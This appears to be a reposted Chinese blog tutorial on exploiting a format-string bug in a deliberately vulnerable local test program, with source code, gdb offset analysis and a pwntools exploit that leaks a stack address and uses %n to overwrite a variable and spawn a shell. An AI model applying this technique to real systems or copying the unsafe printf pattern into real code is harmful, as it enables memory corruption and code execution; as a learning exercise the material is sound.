码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Pwn 学习 fmt_test_2格式化字符串


    Pwn 学习 fmt_test_2格式化字符串

    • 1.测试源代码
    • 2.运行测试程序
    • 3.IDA静态分析
    • 4.漏洞利用思路
      • 第一次循环
      • 第二次循环
    • 5.gdb调试
      • 找到rsp地址
      • 找到rbp的地址
      • 找到v1的地址
    • 6.exp
    • 7.运行结果

    1.测试源代码

    #include
    #include
    #include
    
    int test1;
    
    int init_func(){
        setvbuf(stdin, 0, 2, 0);
        setvbuf(stdout, 0,2 ,0);
        setvbuf(stderr, 0, 2, 0);
        return 0;
    }
    
    int dofunc(){
        char buf1[0x10];
        char buf2[0x10];
        char buf3[0x10];
        int test2 = 0;
        int test3 = 0;
        while(1){
            puts("input:");
            read(0, buf1, 0x100);
            printf(buf1);
            if(test3 == 100){
                system("/bin/zsh");
            }
        }
        return 0;
    }
    
    int main(){
        init_func();
        dofunc();
        return 0;
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35

    2.运行测试程序

    在这里插入图片描述

    3.IDA静态分析

    在这里插入图片描述

    4.漏洞利用思路

    第一次循环

    • 利用格式化字符串泄露rbp的地址
    • 根据rbp的地址计算出v1的地址

    第二次循环

    • 计算写入指针地址
    • 使用%n在v1的地址上写入100
    • 注意x64程序需要对齐,x86可以不用对齐

    5.gdb调试

    找到rsp地址

    在这里插入图片描述

    • 在程序输入时我们连续输入%p用来测试
      在这里插入图片描述
    • 等待程序打印结果
    • 观察栈上rsp的位置
      在这里插入图片描述
    • 不难看出rsp是第6个%p打印出来的

    找到rbp的地址

    • 直接在栈上看,rbp就是第14个%p打印出来的
    • 我们可以使用gdb测试一下
      在这里插入图片描述
    • 使用%14$p直接打印第14个地址上的内容
      在这里插入图片描述
    • 再看一下栈
      在这里插入图片描述
    • 事实证明都是一个内容

    找到v1的地址

    • 我们看到使用%p泄露的是rbp上的内容,而不是rbp本身的地址
    • 所以计算v1的地址我们要知道rbp上的内容其实是下一个rbp的地址
    • dec0是下一个rbp,与当前rbp相差0x10
      在这里插入图片描述
    • 看一下汇编代码
    • 这个v1的地址就是[rbp-8]
    • 所以经过泄露的地址加偏移
    • 最终v1的地址应该是 leak_addr - 0x18

    6.exp

    • 再构造第二次payload时要注意对齐,补全16位
    from pwn import *
    
    context(log_level='debug', arch='amd64', os='linux')
    
    pwnfile = './fmt_test_2'
    
    io = process(pwnfile)
    
    payload_1 = b'%14$p'
    
    io.recvline()
    
    io.sendline(payload_1)
    
    rbp_content = int(io.recv()[2:14], 16)
    
    print("content is ", hex(rbp_content))
    
    text3_addr = rbp_content - 0x18
    
    print("text3_addr is ", hex(text3_addr))
    
    payload_2 = b"%100c%12$naaaaaa" + p64(text3_addr)
    
    payload_2_test = p64(text3_addr) + b"%100c%10$hhn"
    
    io.send(payload_2)
    
    gdb.attach(io)
    
    pause()
    
    io.interactive()
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34

    7.运行结果

    在这里插入图片描述

  • 相关阅读:
    VBA之正则表达式(43)-- 从网页中提取指定数据
    8.会话跟踪技术
    视频分辨率/帧率/码率选择参考
    mongodb入门(二)
    【数据处理】如何在图片中随机采样
    计算机毕业设计springboot+vue基本微信小程序的透析耗材管理系统
    fatal error: H5Cpp.h: No such file or directory #include “H5Cpp.h“
    Boost研究:Boost Log
    【CI/CD】详解自动化开发之CI/CD(持续集成、持续交付、持续部署)
    设置共享文件夹在主机与本地VMware虚拟机之间传输文件
  • 原文地址:https://blog.csdn.net/MrTreebook/article/details/126448130
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号